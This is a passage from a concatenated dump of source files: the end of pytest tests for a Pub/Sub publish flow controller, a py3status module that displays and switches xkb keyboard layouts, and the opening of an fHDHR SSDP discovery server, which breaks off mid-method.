        limit_exceeded_behavior=types.LimitExceededBehavior.ERROR,
    )
    controller = FlowController(settings)
    # Each payload is 100 bytes, so both messages combined exceed the
    # 199-byte limit, but a single message does not (the per-message
    # overhead is far smaller than the data size).
    first = grpc_types.PubsubMessage(data=b"x" * 100)
    second = grpc_types.PubsubMessage(data=b"y" * 100)
    controller.add(first)
    with pytest.raises(exceptions.FlowControlLimitError) as error:
        controller.add(second)
    combined_size = first._pb.ByteSize() + second._pb.ByteSize()
    assert "bytes: {} / 199".format(combined_size) in str(error.value)
def test_no_error_on_moderate_message_flow():
    """Releasing messages frees capacity, so this sequence never overflows."""
    settings = types.PublishFlowControl(
        message_limit=2,
        byte_limit=250,
        limit_exceeded_behavior=types.LimitExceededBehavior.ERROR,
    )
    controller = FlowController(settings)
    first = grpc_types.PubsubMessage(data=b"x" * 100)
    second = grpc_types.PubsubMessage(data=b"y" * 100)
    third = grpc_types.PubsubMessage(data=b"z" * 100)
    # The settings accept two in-flight messages, but not three. If
    # releasing works correctly, no call below raises.
    controller.add(first)
    controller.add(second)
    controller.release(first)
    controller.add(third)
    controller.release(second)
    controller.release(third)
def test_rejected_messages_do_not_increase_total_load():
    """Messages rejected on overflow must not count against the load."""
    settings = types.PublishFlowControl(
        message_limit=1,
        byte_limit=150,
        limit_exceeded_behavior=types.LimitExceededBehavior.ERROR,
    )
    controller = FlowController(settings)
    first = grpc_types.PubsubMessage(data=b"x" * 100)
    second = grpc_types.PubsubMessage(data=b"y" * 100)
    controller.add(first)
    for _ in range(5):
        with pytest.raises(exceptions.FlowControlLimitError):
            controller.add(grpc_types.PubsubMessage(data=b"z" * 100))
    # After releasing a message we should again be able to add another one,
    # despite having previously tried to add many other messages.
    controller.release(first)
    controller.add(second)
def test_incorrectly_releasing_too_many_messages():
    """Releasing a never-added message warns but does not corrupt stats."""
    settings = types.PublishFlowControl(
        message_limit=1,
        byte_limit=150,
        limit_exceeded_behavior=types.LimitExceededBehavior.ERROR,
    )
    controller = FlowController(settings)
    first = grpc_types.PubsubMessage(data=b"x" * 100)
    second = grpc_types.PubsubMessage(data=b"y" * 100)
    third = grpc_types.PubsubMessage(data=b"z" * 100)
    # Releasing a message that would make the load negative should result
    # in a warning.
    with warnings.catch_warnings(record=True) as warned:
        controller.release(first)
    assert len(warned) == 1
    assert issubclass(warned[0].category, RuntimeWarning)
    assert "never added or already released" in str(warned[0].message)
    # Incorrectly removing a message does not mess up internal stats; only
    # a single message at a time can still be added to this flow.
    controller.add(second)
    with pytest.raises(exceptions.FlowControlLimitError) as error:
        controller.add(third)
    error_msg = str(error.value)
    assert "messages: 2 / 1" in error_msg
    combined_size = second._pb.ByteSize() + third._pb.ByteSize()
    assert "bytes: {} / 150".format(combined_size) in error_msg
def test_blocking_on_overflow_until_free_capacity():
    """BLOCK behavior: adds past capacity block until a release frees room,
    and each release unblocks exactly one waiting thread."""
    settings = types.PublishFlowControl(
        message_limit=1,
        byte_limit=150,
        limit_exceeded_behavior=types.LimitExceededBehavior.BLOCK,
    )
    flow_controller = FlowController(settings)
    msg1 = grpc_types.PubsubMessage(data=b"x" * 100)
    msg2 = grpc_types.PubsubMessage(data=b"y" * 100)
    msg3 = grpc_types.PubsubMessage(data=b"z" * 100)
    msg4 = grpc_types.PubsubMessage(data=b"w" * 100)
    # If there is a concurrency bug in FlowController, we do not want to block
    # the main thread running the tests, thus we delegate all add/release
    # operations to daemon threads and check the outcome (blocked/not blocked)
    # through Events.
    adding_1_done = threading.Event()
    adding_2_done = threading.Event()
    adding_3_done = threading.Event()
    adding_4_done = threading.Event()
    releasing_1_done = threading.Event()
    releasing_x_done = threading.Event()
    # Adding a message with free capacity should not block.
    _run_in_daemon(flow_controller.add, [msg1], adding_1_done)
    if not adding_1_done.wait(timeout=0.1):
        pytest.fail(  # pragma: NO COVER
            "Adding a message with enough flow capacity blocked or errored."
        )
    # Adding messages when there is not enough capacity should block, even if
    # added through multiple threads.
    _run_in_daemon(flow_controller.add, [msg2], adding_2_done)
    if adding_2_done.wait(timeout=0.1):
        pytest.fail("Adding a message on overflow did not block.")  # pragma: NO COVER
    _run_in_daemon(flow_controller.add, [msg3], adding_3_done)
    if adding_3_done.wait(timeout=0.1):
        pytest.fail("Adding a message on overflow did not block.")  # pragma: NO COVER
    _run_in_daemon(flow_controller.add, [msg4], adding_4_done)
    if adding_4_done.wait(timeout=0.1):
        pytest.fail("Adding a message on overflow did not block.")  # pragma: NO COVER
    # After releasing one message, there should be room for a new message, which
    # should result in unblocking one of the waiting threads.
    _run_in_daemon(flow_controller.release, [msg1], releasing_1_done)
    if not releasing_1_done.wait(timeout=0.1):
        pytest.fail("Releasing a message blocked or errored.")  # pragma: NO COVER
    done_status = [
        adding_2_done.wait(timeout=0.1),
        adding_3_done.wait(timeout=0.1),
        adding_4_done.wait(timeout=0.1),
    ]
    # In sum() we use the fact that True==1 and False==0, and that Event.wait()
    # returns False only if it times out, i.e. its internal flag has not been set.
    done_count = sum(done_status)
    assert done_count == 1, "Exactly one thread should have been unblocked."
    # Release another message and verify that yet another thread gets unblocked.
    added_msg = [msg2, msg3, msg4][done_status.index(True)]
    _run_in_daemon(flow_controller.release, [added_msg], releasing_x_done)
    if not releasing_x_done.wait(timeout=0.1):
        pytest.fail("Releasing messages blocked or errored.")  # pragma: NO COVER
    released_count = sum(
        (
            adding_2_done.wait(timeout=0.1),
            adding_3_done.wait(timeout=0.1),
            adding_4_done.wait(timeout=0.1),
        )
    )
    assert released_count == 2, "Exactly two threads should have been unblocked."
def test_error_if_mesage_would_block_indefinitely():
    """A message that can never fit must raise instead of blocking forever.

    NOTE(review): "mesage" in the test name is a typo, but renaming would
    change the collected test id, so it is kept.
    """
    settings = types.PublishFlowControl(
        message_limit=0,  # simulate non-sane settings
        byte_limit=1,
        limit_exceeded_behavior=types.LimitExceededBehavior.BLOCK,
    )
    controller = FlowController(settings)
    message = grpc_types.PubsubMessage(data=b"xyz")
    adding_done = threading.Event()
    error_event = threading.Event()
    _run_in_daemon(controller.add, [message], adding_done, error_event=error_event)
    assert error_event.wait(timeout=0.1), "No error on adding too large a message."
    # Now that we know that an error occurs, we can check its type directly
    # without the fear of blocking indefinitely.
    controller = FlowController(settings)  # we want a fresh controller
    with pytest.raises(exceptions.FlowControlLimitError) as error_info:
        controller.add(message)
    error_msg = str(error_info.value)
    assert "would block forever" in error_msg
    assert "messages: 1 / 0" in error_msg
    assert "bytes: {} / 1".format(message._pb.ByteSize()) in error_msg
def test_threads_posting_large_messages_do_not_starve():
    """Capacity freed by releases must go to the earlier-queued large
    message, not to small messages added after it."""
    settings = types.PublishFlowControl(
        message_limit=100,
        byte_limit=110,
        limit_exceeded_behavior=types.LimitExceededBehavior.BLOCK,
    )
    flow_controller = FlowController(settings)
    large_msg = grpc_types.PubsubMessage(data=b"x" * 100)  # close to entire byte limit
    adding_initial_done = threading.Event()
    adding_large_done = threading.Event()
    adding_busy_done = threading.Event()
    releasing_busy_done = threading.Event()
    releasing_large_done = threading.Event()
    # Occupy some of the flow capacity, then try to add a large message. Releasing
    # enough messages should eventually allow the large message to come through, even
    # if more messages are added after it (those should wait for the large message).
    initial_messages = [grpc_types.PubsubMessage(data=b"x" * 10)] * 5
    _run_in_daemon(flow_controller.add, initial_messages, adding_initial_done)
    assert adding_initial_done.wait(timeout=0.1)
    _run_in_daemon(flow_controller.add, [large_msg], adding_large_done)
    # Continuously keep adding more messages after the large one.
    messages = [grpc_types.PubsubMessage(data=b"x" * 10)] * 10
    _run_in_daemon(flow_controller.add, messages, adding_busy_done, action_pause=0.1)
    # At the same time, gradually keep releasing the messages - the freed up
    # capacity should be consumed by the large message, not the other small messages
    # being added after it.
    _run_in_daemon(
        flow_controller.release, messages, releasing_busy_done, action_pause=0.1
    )
    # Sanity check - releasing should have completed by now.
    if not releasing_busy_done.wait(timeout=1.1):
        pytest.fail("Releasing messages blocked or errored.")  # pragma: NO COVER
    # Enough messages released, the large message should have come through in
    # the meantime.
    if not adding_large_done.wait(timeout=0.1):
        pytest.fail("A thread adding a large message starved.")  # pragma: NO COVER
    if adding_busy_done.wait(timeout=0.1):
        pytest.fail("Adding multiple small messages did not block.")  # pragma: NO COVER
    # Releasing the large message should unblock adding the remaining "busy" messages
    # that have not been added yet.
    _run_in_daemon(flow_controller.release, [large_msg], releasing_large_done)
    if not releasing_large_done.wait(timeout=0.1):
        pytest.fail("Releasing a message blocked or errored.")  # pragma: NO COVER
    if not adding_busy_done.wait(timeout=1.0):
        pytest.fail("Adding messages blocked or errored.")  # pragma: NO COVER
def test_blocked_messages_are_accepted_in_fifo_order():
    """Messages queued behind a full flow must be admitted in arrival order."""
    settings = types.PublishFlowControl(
        message_limit=1,
        byte_limit=1_000_000,  # Unlimited for practical purposes in the test.
        limit_exceeded_behavior=types.LimitExceededBehavior.BLOCK,
    )
    flow_controller = FlowController(settings)
    # It's OK if the message instance is shared, as flow controller is only concerned
    # with byte sizes and counts, and not with particular message instances.
    message = grpc_types.PubsubMessage(data=b"x")
    adding_done_events = [threading.Event() for _ in range(10)]
    releasing_done_events = [threading.Event() for _ in adding_done_events]
    # Add messages. The first one will be accepted, and the rest should queue behind.
    for adding_done in adding_done_events:
        _run_in_daemon(flow_controller.add, [message], adding_done)
        # Short pause so each daemon thread queues in a deterministic order.
        time.sleep(0.1)
    if not adding_done_events[0].wait(timeout=0.1):  # pragma: NO COVER
        pytest.fail("The first message unexpectedly got blocked on adding.")
    # For each message, check that it has indeed been added to the flow controller.
    # Then release it to make room for the next message in line, and repeat the check.
    enumeration = enumerate(zip(adding_done_events, releasing_done_events))
    for i, (adding_done, releasing_done) in enumeration:
        if not adding_done.wait(timeout=0.1):  # pragma: NO COVER
            pytest.fail(f"Queued message still blocked on adding (i={i}).")
        _run_in_daemon(flow_controller.release, [message], releasing_done)
        if not releasing_done.wait(timeout=0.1):  # pragma: NO COVER
            pytest.fail(f"Queued message was not released in time (i={i}).")
def test_warning_on_internal_reservation_stats_error_when_unblocking():
    """Corrupted internal reservation stats surface as a RuntimeWarning
    when a release unblocks a waiting add."""
    settings = types.PublishFlowControl(
        message_limit=1,
        byte_limit=150,
        limit_exceeded_behavior=types.LimitExceededBehavior.BLOCK,
    )
    flow_controller = FlowController(settings)
    msg1 = grpc_types.PubsubMessage(data=b"x" * 100)
    msg2 = grpc_types.PubsubMessage(data=b"y" * 100)
    # If there is a concurrency bug in FlowController, we do not want to block
    # the main thread running the tests, thus we delegate all add/release
    # operations to daemon threads and check the outcome (blocked/not blocked)
    # through Events.
    adding_1_done = threading.Event()
    adding_2_done = threading.Event()
    releasing_1_done = threading.Event()
    # Adding a message with free capacity should not block.
    _run_in_daemon(flow_controller.add, [msg1], adding_1_done)
    if not adding_1_done.wait(timeout=0.1):
        pytest.fail(  # pragma: NO COVER
            "Adding a message with enough flow capacity blocked or errored."
        )
    # Adding messages when there is not enough capacity should block, even if
    # added through multiple threads.
    _run_in_daemon(flow_controller.add, [msg2], adding_2_done)
    if adding_2_done.wait(timeout=0.1):
        pytest.fail("Adding a message on overflow did not block.")  # pragma: NO COVER
    # Intentionally corrupt internal stats
    reservation = next(iter(flow_controller._waiting.values()), None)
    assert reservation is not None, "No messages blocked by flow controller."
    reservation.bytes_reserved = reservation.bytes_needed + 1
    with warnings.catch_warnings(record=True) as warned:
        _run_in_daemon(flow_controller.release, [msg1], releasing_1_done)
        if not releasing_1_done.wait(timeout=0.1):
            pytest.fail("Releasing a message blocked or errored.")  # pragma: NO COVER
    matches = [warning for warning in warned if warning.category is RuntimeWarning]
    assert len(matches) == 1
    assert "too many bytes reserved" in str(matches[0].message).lower()
|
xkb_input.py | r"""
Switch inputs.
Configuration parameters:
button_next: mouse button to cycle next layout (default 4)
button_prev: mouse button to cycle previous layout (default 5)
cache_timeout: refresh interval for this module; xkb-switch
and swaymsg will listen for new updates instead (default 10)
format: display format for this module (default '{format_input}')
format_input: display format for inputs
(default '[{alias}][\?soft ][\?color=s {s}[ {v}]]')
format_input_separator: show separator if more than one (default ' ')
inputs: specify a list of inputs to use in swaymsg (default [])
switcher: specify xkb-switch, xkblayout-state, xkbgroup,
or swaymsg to use, otherwise auto (default None)
thresholds: specify color thresholds to use
*(default [("fr", "lightgreen"), ("ru", "lightcoral"),
("ua", "khaki"), ("us", "lightskyblue")])*
Format placeholders:
{format_input} format for inputs
{input} number of inputs, eg 1
{switcher} eg, xkb-switch, xkblayout-state, xkbgroup, swaymsg
format_input placeholders:
xkb-switch:
xkblayout-state:
xkbgroup:
swaymsg:
{c} layout number, eg, 0
{n} layout name, eg, English (US)
{s} layout symbol, eg, us
{v} layout variant, eg, basic
{e} layout variant, {v} or {s}, eg, dvorak
{C} layout count, eg, 2
swaymsg:
{alias} custom string or {name}
{identifier} eg, 162:253 USB-HID Keyboard
{name} eg, Trackball, Keyboard, etc
{vendor} eg, 320
{product} eg, 556
{type} eg, pointer, keyboard, touchpad, etc
{xkb_layout_names} eg, English (US), French, Russian
{xkb_active_layout_index} eg, 0, 1, 2, etc
{xkb_active_layout_name} eg, English (US)
{send_events} eg, True
{accel_speed} eg, 0.0
{accel_profile} eg, adaptive
{natural_scroll} eg, adaptive
{left_handed} eg, False
{middle_emulation} eg, False
{scroll_method} eg, None
{scroll_button} eg, 274
Use `swaymsg -r -t get_inputs` to get a list of current sway inputs
and for a list of placeholders. Not all of placeholders will be usable.
Color thresholds:
xxx: print a color based on the value of `xxx` placeholder
Requires:
xkb-switch: program that allows to query and change the xkb layout state
xkblayout-state: a command-line program to get/set the current keyboard layout
xkbgroup: query and change xkb layout state
swaymsg: send messages to sway window manager
Examples:
```
# sway users: for best results, add switcher to avoid false positives with `pgrep i3`
# because sway users can be using scripts, tools, et cetera with `i3` in its name.
xkb_input {
switcher = "swaymsg"
}
# sway users: specify inputs to fnmatch
xkb_input {
# display logitech identifiers
inputs = [{"identifier": "*Logitech*"}]
# display logi* keyboards only
inputs = [{"name": "Logi*", "type": "keyb*"}]
# display pointers only
inputs = [{"type": "pointer"}]
}
# sway users: display inputs, optional aliases, et cetera
xkb_input {
inputs = [
{"identifier": "1625:3192:Heng_Yu_Technology_Poker_II", "alias": "Poker 2"},
{"identifier": "0012:021:USB-HID_Keyboard", "alias": "Race 3"},
{"identifier": "0123:45678:Logitech_MX_Ergo", "alias": "MX Ergo", "type": "pointer"},
]
}
# i3 users: display inputs - see https://wiki.archlinux.org/index.php/X_keyboard_extension
# $ setxkbmap -layout "us,fr,ru" # install xkb-group to enable a listener thread
```
@author lasers, saengowp, javiertury
SAMPLE OUTPUT
{"color": "#87CEFA", "full_text": "us"}
fr
{"color": "#90EE90", "full_text": "fr"}
ru
{"color": "#F08080", "full_text": "ru"}
au
{"color": "#F0E68C", "full_text": "au"}
"""
from pathlib import Path
STRING_ERROR = "invalid command `{}`"
STRING_NOT_AVAILABLE = "no available binary"
STRING_NOT_INSTALLED = "command `{}` not installed"
class Listener:
    """Background watcher that calls ``parent.py3.update()`` whenever the
    monitored command prints a line, replacing interval polling.

    swaymsg -m - monitor for responses until killed
    xkb-switch -W - infinitely waits for group change
    """

    def __init__(self, parent):
        self.parent = parent
        # Pick the listener command matching the configured switcher; if
        # neither tool applies, return early and never start a thread.
        if self.parent.switcher == "swaymsg":
            self.listen_command = ["swaymsg", "-m", "-t", "subscribe", "['input']"]
        elif self.parent.py3.check_commands("xkb-switch"):
            self.listen_command = ["xkb-switch", "-W"]
        else:
            return
        self.setup(parent)

    def setup(self, parent):
        # The listener makes polling unnecessary, so the module result can
        # be cached forever; start() runs on a daemon thread.
        from threading import Thread

        self.parent.cache_timeout = self.parent.py3.CACHE_FOREVER
        self.process = None
        t = Thread(target=self.start)
        t.daemon = True
        t.start()

    def start(self):
        # Daemon-thread body: block on the subprocess's stdout and request
        # a refresh of the parent module after every emitted line.
        from subprocess import Popen, PIPE

        try:
            self.process = Popen(self.listen_command, stdout=PIPE)
            while True:
                self.process.stdout.readline()
                # A non-None poll() result means the subprocess died.
                code = self.process.poll()
                if code is not None:
                    msg = "Command `{}` terminated with returncode {}"
                    raise Exception(msg.format(" ".join(self.listen_command), code))
                self.parent.py3.update()
        except Exception as err:
            # Record the failure on the parent and refresh so the error
            # becomes visible.
            self.parent.error = err
            self.parent.py3.update()
        finally:
            self.kill()

    def kill(self):
        # Best-effort: self.process may still be None (never started), in
        # which case .kill raises AttributeError and is ignored.
        try:
            self.process.kill()
        except AttributeError:
            pass
class Xkb:
    """
    Base class for the layout switcher backends; loads symbol/name lookup
    tables from the X11 xkb rules database.
    """

    def __init__(self, parent):
        self.parent = parent
        self.post_config_setup(parent)
        self.setup(parent)

    def py3_command_output(self, *args):
        # Wrapper that records command failures on the parent before
        # re-raising, so the module can display the error.
        try:
            return self.parent.py3.command_output(*args)
        except self.parent.py3.CommandError as err:
            self.parent.error = err
            raise err

    def py3_command_run(self, *args):
        # Same error-recording wrapper as py3_command_output, for run().
        try:
            return self.parent.py3.command_run(*args)
        except self.parent.py3.CommandError as err:
            self.parent.error = err
            raise err

    def post_config_setup(self, parent):
        """Parse /usr/share/X11/xkb/rules/base.lst into lookup tables.

        Chunks are separated by blank lines; the "! layout" chunk holds
        "symbol Name..." lines and the "! variant" chunk holds
        "variant symbol<sep> Name..." lines (the separator character after
        the symbol is stripped via ``fields[1][:-1]``).
        """
        self.name_mapping = {}          # symbol -> layout name
        self.reverse_name_mapping = {}  # name -> (symbol, variant or None)
        self.variant_mapping = []       # (variant, symbol, name) triples
        try:
            with Path("/usr/share/X11/xkb/rules/base.lst").open() as f:
                for chunk in f.read().split("\n\n"):
                    if "! layout" in chunk:
                        for line in chunk.splitlines()[1:]:
                            fields = line.split()
                            symbol, name = (fields[0], " ".join(fields[1:]))
                            self.name_mapping[symbol] = name
                            self.reverse_name_mapping[name] = (symbol, None)
                    if "! variant" in chunk:
                        for line in chunk.splitlines()[1:]:
                            fields = line.split()
                            variant, symbol, name = (
                                fields[0],
                                fields[1][:-1],
                                " ".join(fields[2:]),
                            )
                            self.reverse_name_mapping[name] = (symbol, variant)
                            self.variant_mapping.append((variant, symbol, name))
        except OSError as err:
            # base.lst missing or unreadable: record the error on the parent.
            self.parent.error = err

    def setup(self, parent):
        # Hook for subclasses; the base class needs no extra setup.
        pass

    def add_libinput(self, _input):
        # Hook for subclasses; no-op in the base class.
        pass

    def set_xkb_layout(self, delta):
        # Hook for subclasses that can switch layouts; no-op here.
        pass
class Xkbgroup(Xkb):
    """
    xkbgroup - query and change xkb layout state
    """

    def setup(self, parent):
        from xkbgroup import XKeyboard

        self.xo = XKeyboard
        # XKeyboard field name -> placeholder letter used by format_input.
        self.map = {"num": "c", "name": "n", "symbol": "s", "variant": "v"}

    def get_xkb_inputs(self):
        keyboard = self.xo()
        group_data = keyboard.group_data._asdict()
        xkb_input = {}
        for field, value in group_data.items():
            xkb_input[self.map[field]] = value
        # "e" prefers the variant, falling back to the plain symbol.
        xkb_input["e"] = xkb_input["v"] or xkb_input["s"]
        xkb_input["C"] = keyboard.groups_count
        return [xkb_input]

    def set_xkb_layout(self, delta):
        keyboard = self.xo()
        keyboard.group_num = (keyboard.group_num + delta) % keyboard.groups_count
class Xkb_Switch(Xkb):
    """
    xkb-switch - program that allows to query and change the xkb layout state
    """

    def setup(self, parent):
        # Only query the layout list when {c}/{C} placeholders are in use.
        self.init_cC = self.parent.py3.format_contains(self.parent.format_input, "[cC]")

    def get_xkb_inputs(self):
        output = self.py3_command_output("xkb-switch -p").strip()
        symbol = output
        variant = None
        if "(" in output and ")" in output:
            # Output like "us(dvorak)" carries the variant in parentheses.
            open_paren = output.find("(")
            variant = output[open_paren + 1 : output.find(")")]
            symbol = output[:open_paren]
        name = None
        for known_variant, known_symbol, known_name in self.variant_mapping:
            if (variant, symbol) == (known_variant, known_symbol):
                name = known_name
                break
        else:
            name = self.name_mapping.get(symbol)
        xkb_input = {"s": symbol, "v": variant, "e": variant or symbol, "n": name}
        if self.init_cC:
            layouts = self.py3_command_output("xkb-switch -l").splitlines()
            xkb_input["C"] = len(layouts)
            for index, layout in enumerate(layouts):
                if layout == output:
                    xkb_input["c"] = index
                    break
        return [xkb_input]

    def set_xkb_layout(self, delta):
        if delta > 0:
            self.py3_command_run("xkb-switch -n")
            return
        # No "previous" flag exists; select the entry before the current one.
        current = self.py3_command_output("xkb-switch -p").strip()
        layouts = self.py3_command_output("xkb-switch -l").splitlines()
        previous = layouts[layouts.index(current) - 1]
        self.py3_command_run("xkb-switch -s {}".format(previous))
class Xkblayout_State(Xkb):
    """
    xkblayout-state - a command-line program to get/set the current keyboard layout
    """

    def setup(self, parent):
        # Ask for every placeholder in one call, joined by a unique separator.
        self.placeholders = list("cnsveC")
        self.separator = "|SEPARATOR|"
        query = self.separator.join("%" + x for x in self.placeholders)
        self.xkblayout_command = "xkblayout-state print {}".format(query)

    def get_xkb_inputs(self):
        fields = self.py3_command_output(self.xkblayout_command).split(self.separator)
        xkb_input = dict(zip(self.placeholders, fields))
        # Prefer the full layout name from base.lst when available.
        xkb_input["n"] = self.name_mapping.get(xkb_input["s"], xkb_input["n"])
        return [xkb_input]

    def set_xkb_layout(self, delta):
        direction = {+1: "+", -1: "-"}[delta]
        self.py3_command_run(
            "xkblayout-state set {}{}".format(direction, abs(delta))
        )
class Swaymsg(Xkb):
    """
    swaymsg - send messages to sway window manager
    """

    def setup(self, parent):
        from json import loads
        from fnmatch import fnmatch

        # "alias" is config-only metadata; it is never matched against sway data.
        self.excluded = ["alias"]
        self.fnmatch, self.loads = (fnmatch, loads)
        # Normalize libinput string states to Python values.
        self.map = {"enabled": True, "disabled": False, "none": None}
        self.swaymsg_command = ["swaymsg", "--raw", "--type", "get_inputs"]

    def add_libinput(self, _input):
        # Flatten the nested "libinput" dict into the input dict itself.
        libinput = _input.pop("libinput", {})
        _input.update({k: self.map.get(v, v) for k, v in libinput.items()})
        return _input

    def update_xkb_input(self, xkb_input, _filter):
        """Decorate a sway input dict with this module's placeholder keys."""
        xkb_input["alias"] = _filter.get("alias", xkb_input["name"])
        if "xkb_active_layout_name" in xkb_input:
            c = xkb_input["xkb_active_layout_index"]
            C = len(xkb_input["xkb_layout_names"])
            n = xkb_input["xkb_active_layout_name"]
            # Map the long layout name back to (symbol, variant) if known.
            s, v = self.reverse_name_mapping.get(n, (None, None))
            if s is None and "(" in n and ")" in n:
                # Fall back to parsing e.g. "English (US)" -> s="us", n="English".
                s = n[n.find("(") + 1 : n.find(")")].lower()
                n = n[: n.find("(") - 1]
            xkb_input["xkb_layout_names"] = ", ".join(xkb_input["xkb_layout_names"])
            xkb_input.update({"c": c, "C": C, "s": s, "e": v or s, "n": n, "v": v})
        return xkb_input

    def get_xkb_inputs(self):
        try:
            xkb_data = self.loads(self.py3_command_output(self.swaymsg_command))
        except Exception:
            # swaymsg missing or returned non-JSON; show nothing.
            xkb_data = []
        new_input = []
        for xkb_input in xkb_data:
            if self.parent.inputs:
                for _filter in self.parent.inputs:
                    # for/else: append only when every filter key fnmatch-es.
                    for key, value in _filter.items():
                        if key in self.excluded or key not in xkb_input:
                            continue
                        if not self.fnmatch(xkb_input[key], value):
                            break
                    else:
                        # NOTE(review): an input matching several configured
                        # filters is appended once per matching filter —
                        # presumably filters are meant to be disjoint; verify.
                        new_input.append(self.update_xkb_input(xkb_input, _filter))
            else:
                # No filters configured: show every input.
                _filter = {}
                new_input.append(self.update_xkb_input(xkb_input, _filter))
        return new_input
class Py3status:
    """
    Display and switch xkb keyboard layouts.

    Picks one of four switcher backends (xkb-switch, xkblayout-state,
    xkbgroup, swaymsg) and renders the active layout(s) with thresholds.
    """

    # available configuration parameters
    button_next = 4  # mouse button to cycle to the next layout
    button_prev = 5  # mouse button to cycle to the previous layout
    cache_timeout = 10  # refresh interval; overridden once a Listener runs
    format = "{format_input}"
    format_input = r"[{alias}][\?soft ][\?color=s {s}[ {v}]]"
    format_input_separator = " "
    inputs = []  # sway only: filters/aliases selecting which inputs to show
    switcher = None  # backend name; auto-detected when unset
    thresholds = [
        ("fr", "lightgreen"),
        ("ru", "lightcoral"),
        ("ua", "khaki"),
        ("us", "lightskyblue"),
    ]

    def post_config_hook(self):
        # Pick a switcher: honor an explicit user choice, else prefer swaymsg
        # under sway, else the first installed binary from the list.
        switchers = ["xkb-switch", "xkblayout-state", "xkbgroup", "swaymsg"]
        if not self.switcher:
            if self.py3.get_wm_msg() == "swaymsg":
                self.switcher = "swaymsg"
            else:
                self.switcher = self.py3.check_commands(switchers)
        elif self.switcher not in switchers:
            raise Exception(STRING_ERROR.format(self.switcher))
        elif not self.py3.check_commands(self.switcher):
            raise Exception(STRING_NOT_INSTALLED.format(self.switcher))
        if not self.switcher:
            raise Exception(STRING_NOT_AVAILABLE)
        self.error = None
        # e.g. "xkb-switch" -> class Xkb_Switch, "swaymsg" -> Swaymsg.
        self.input_backend = globals()[self.switcher.replace("-", "_").title()](self)
        if getattr(self, "listener", True):
            self.listener_backend = Listener(self)
        self.thresholds_init = {}
        for name in ["format", "format_input"]:
            self.thresholds_init[name] = self.py3.get_color_names_list(
                getattr(self, name)
            )

    def _stop_on_errors(self):
        # Propagate a backend/listener failure as a permanent module error.
        if self.error:
            self.kill()
            self.py3.error(str(self.error), self.py3.CACHE_FOREVER)

    def xkb_input(self):
        """py3status entry point: render the configured format."""
        xkb_inputs = self.input_backend.get_xkb_inputs()
        self._stop_on_errors()
        new_input = []
        for _input in xkb_inputs:
            # add_libinput returns the dict for sway, None for other backends.
            _input = self.input_backend.add_libinput(_input) or _input
            for x in self.thresholds_init["format_input"]:
                if x in _input:
                    self.py3.threshold_get_color(_input[x], x)
            new_input.append(self.py3.safe_format(self.format_input, _input))
        format_input_separator = self.py3.safe_format(self.format_input_separator)
        format_input = self.py3.composite_join(format_input_separator, new_input)
        input_data = {
            "format_input": format_input,
            "input": len(xkb_inputs),
            "switcher": self.switcher,
        }
        for x in self.thresholds_init["format"]:
            if x in input_data:
                self.py3.threshold_get_color(input_data[x], x)
        return {
            "cached_until": self.py3.time_in(self.cache_timeout),
            "full_text": self.py3.safe_format(self.format, input_data),
        }

    def kill(self):
        try:
            self.listener_backend.kill()
        except AttributeError:
            # No listener was ever created.
            pass

    def on_click(self, event):
        # Cycle layouts with the configured mouse buttons.
        button = event["button"]
        if button == self.button_next:
            self.input_backend.set_xkb_layout(+1)
        elif button == self.button_prev:
            self.input_backend.set_xkb_layout(-1)
if __name__ == "__main__":
    """
    Run module in test mode.
    """
    # Renders this module standalone via py3status's test harness.
    from py3status.module_test import module_test

    module_test(Py3status)
|
__init__.py | # Adapted from https://github.com/MoshiBin/ssdpy and https://github.com/ZeWaren/python-upnp-ssdp-example
import socket
import struct
import threading
class SSDPServer():
    """
    fHDHR SSDP server.

    Handles UPnP/SSDP discovery on multicast port 1900: answers M-SEARCH
    queries, emits NOTIFY announcements, and delegates protocol-specific
    payloads to installed plugins of type "ssdp".
    """

    def __init__(self, fhdhr):
        self.fhdhr = fhdhr
        self.ssdp_handling = {}
        # Names of installed SSDP plugins; without any, there is nothing to serve.
        self.methods = [x for x in list(self.fhdhr.plugins.plugins.keys()) if self.fhdhr.plugins.plugins[x].type == "ssdp"]
        if self.multicast_address and self.fhdhr.config.dict["ssdp"]["enabled"] and len(self.methods):
            self.fhdhr.logger.info("Initializing SSDP system")
            try:
                self.setup_ssdp()
                self.sock.bind((self.bind_address, 1900))
                self.msearch_payload = self.create_msearch_payload()
                self.max_age = int(fhdhr.config.dict["ssdp"]["max_age"])
                self.age_time = None
                self.ssdp_doalive_url = "/api/ssdp?method=alive"
                # Re-announce on a schedule so peers never see us expire.
                self.fhdhr.scheduler.every(self.max_age).seconds.do(self.fhdhr.api.threadget, url=self.ssdp_doalive_url)
                self.ssdp_method_selfadd()
                self.m_search()
                self.fhdhr.threads["ssdp"] = threading.Thread(target=self.run)
            except OSError as err:
                # BUGFIX: was `logger.Error(...)`; the logger exposes lowercase
                # methods (info/error/ssdp), so `.Error` would itself raise
                # AttributeError inside this handler.
                self.fhdhr.logger.error("SSDP system will not be Initialized: %s" % err)
        elif not self.fhdhr.config.dict["ssdp"]["enabled"]:
            self.fhdhr.logger.info("SSDP system will not be Initialized: Not Enabled")
        elif not self.multicast_address:
            self.fhdhr.logger.info("SSDP system will not be Initialized: Address not set in [ssdp]multicast_address or [fhdhr]discovery_address")
        elif not len(self.methods):
            self.fhdhr.logger.info("SSDP system will not be Initialized: No SSDP Plugins installed.")
        else:
            self.fhdhr.logger.info("SSDP system will not be Initialized")

    def ssdp_method_selfadd(self):
        """
        Instantiate every installed SSDP plugin and register its handler.
        """
        self.fhdhr.logger.info("Detecting and Opening any found SSDP plugins.")
        for plugin_name in list(self.fhdhr.plugins.plugins.keys()):
            if self.fhdhr.plugins.plugins[plugin_name].type == "ssdp":
                method = self.fhdhr.plugins.plugins[plugin_name].name.lower()
                plugin_utils = self.fhdhr.plugins.plugins[plugin_name].plugin_utils
                self.ssdp_handling[method] = self.fhdhr.plugins.plugins[plugin_name].Plugin_OBJ(self.fhdhr, plugin_utils, self.broadcast_ip, self.max_age)

    def start(self):
        """
        Start the SSDP listener thread.
        """
        self.fhdhr.logger.info("SSDP Server Starting")
        self.fhdhr.threads["ssdp"].start()

    def stop(self):
        """
        Safely Shutdown SSDP.
        """
        self.fhdhr.logger.info("SSDP Server Stopping")
        self.sock.close()

    def run(self):
        """
        Listen for SSDP requests until the socket is closed.
        """
        self.do_alive()
        # Loop forever; closing the socket (stop()) ends the thread.
        # (Removed an unreachable self.stop() that followed this loop.)
        while True:
            data, address = self.sock.recvfrom(1024)
            self.on_recv(data, address)

    def do_alive(self):
        """
        Notify the network that we are alive.
        """
        if self.broadcast_address_tuple:
